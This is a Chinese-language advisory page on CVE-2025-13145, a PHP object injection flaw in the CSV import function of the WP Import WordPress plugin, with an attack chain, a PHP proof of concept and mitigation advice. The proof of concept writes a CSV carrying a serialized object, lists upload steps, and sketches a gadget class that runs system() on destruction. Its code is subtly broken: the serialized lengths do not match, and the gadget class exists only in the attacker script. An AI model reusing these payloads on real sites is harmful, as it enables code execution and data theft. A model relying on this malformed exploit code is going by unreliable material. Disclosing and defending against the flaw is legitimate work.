CVE-2025-13145 WordPress WP Import插件PHP对象注入漏洞

漏洞信息

漏洞编号

CVE-2025-13145

漏洞类型

PHP对象注入

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

WP Import – Ultimate CSV XML Importer for WordPress

漏洞概述

CVE-2025-13145是WordPress插件WP Import – Ultimate CSV XML Importer中的一个高危安全漏洞。该插件用于导入CSV和XML数据到WordPress网站。漏洞存在于SingleImportExport.php文件中的import_single_post_as_csv函数，该函数对用户提供CSV文件导入时存在不安全的反序列化操作。未经适当验证的用户输入被直接用于PHP反序列化函数，当攻击者通过CSV文件注入恶意序列化对象时，可触发PHP对象注入漏洞。此漏洞需要攻击者具有管理员级别或更高的权限才能利用。如果目标系统上安装了其他存在POP链（属性操作链）的插件或主题，攻击者可以利用反序列化漏洞执行任意代码、删除任意文件或获取敏感数据。由于该插件在WordPress生态中广泛应用，大量网站可能受到影响。建议受影响的用户立即更新到最新版本或在不使用时暂时禁用该插件。

技术细节

漏洞根源在于SingleImportExport.php文件中import_single_post_as_csv函数对CSV导入数据的不安全处理。该函数在处理CSV文件时，直接将用户可控的数据传递给unserialize()函数进行反序列化操作。PHP的unserialize()函数在处理恶意构造的序列化对象时存在安全风险，攻击者可以通过构造特定的序列化字符串注入任意PHP对象。当WordPress系统加载了包含可利用POP链的插件或主题时，注入的对象会在反序列化过程中自动触发恶意代码执行。攻击者需要上传包含恶意序列化payload的CSV文件，并触发导入功能。CVSS 3.1向量显示该漏洞需要网络访问(N)、低攻击复杂度(L)、高权限要求(H)，无用户交互(N)，对机密性(C)、完整性(I)和可用性(A)均造成高影响。

攻击链分析

STEP 1

步骤1

攻击者获得WordPress网站的管理员权限访问权限

STEP 2

步骤2

攻击者构造包含恶意序列化对象的CSV文件，在特定字段中注入PHP对象payload

STEP 3

步骤3

攻击者通过WP Import插件的CSV导入功能上传恶意CSV文件

STEP 4

步骤4

import_single_post_as_csv函数接收到CSV数据后，直接将用户可控的数据传递给unserialize()函数

STEP 5

步骤5

如果目标系统存在POP链（通过其他插件或主题），反序列化过程触发对象魔术方法执行恶意代码

STEP 6

步骤6

攻击者实现任意文件删除、敏感数据读取或远程代码执行等攻击目标

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
/**
 * CVE-2025-13145 PoC - PHP Object Injection via CSV Import
 * Target: WP Import - Ultimate CSV XML Importer < 7.33.2
 * Author: Security Researcher
 * Note: Requires administrator access
 */

// Example malicious CSV payload for PHP Object Injection
// This payload demonstrates the structure for injecting PHP objects

$malicious_payload = 'O:32:"SomeClass":1:{s:4:"data";s:10:";echo "VULNERABLE";//";}';

// CSV structure for import_single_post_as_csv function
$csv_content = "post_title,post_content,custom_field\n";
$csv_content .= "Malicious Post,Content with {$malicious_payload},test_value\n";

// Save malicious CSV file
file_put_contents('malicious_import.csv', $csv_content);

echo "PoC CSV file created: malicious_import.csv\n";
echo "Payload: {$malicious_payload}\n";
echo "\nTo exploit:\n";
echo "1. Login as WordPress administrator\n";
echo "2. Navigate to WP Import plugin settings\n";
echo "3. Upload the malicious_import.csv file\n";
echo "4. Execute import to trigger object injection\n";

// Alternative: Generate POP chain payload for RCE
// Requires specific POP chain from installed plugins/themes
class EvilClass {
    public $cmd;
    public function __destruct() {
        system($this->cmd);
    }
}

// Serialize the evil object
$pop_chain = serialize(new EvilClass());
echo "\nPOP Chain Payload: {$pop_chain}\n";
?>

影响范围

WP Import – Ultimate CSV XML Importer for WordPress <= 7.33.1

防御指南

临时缓解措施

在官方安全更新发布之前，建议采取以下临时缓解措施：1) 暂时禁用WP Import插件直至完成安全更新；2) 严格限制WordPress管理员账户的创建和权限分配；3) 使用WordPress安全插件监控可疑的管理员操作；4) 对所有上传的CSV文件实施严格的格式验证和内容过滤；5) 考虑使用防火墙规则阻止针对该插件的可疑请求；6) 定期检查网站文件系统是否有异常文件创建或修改痕迹。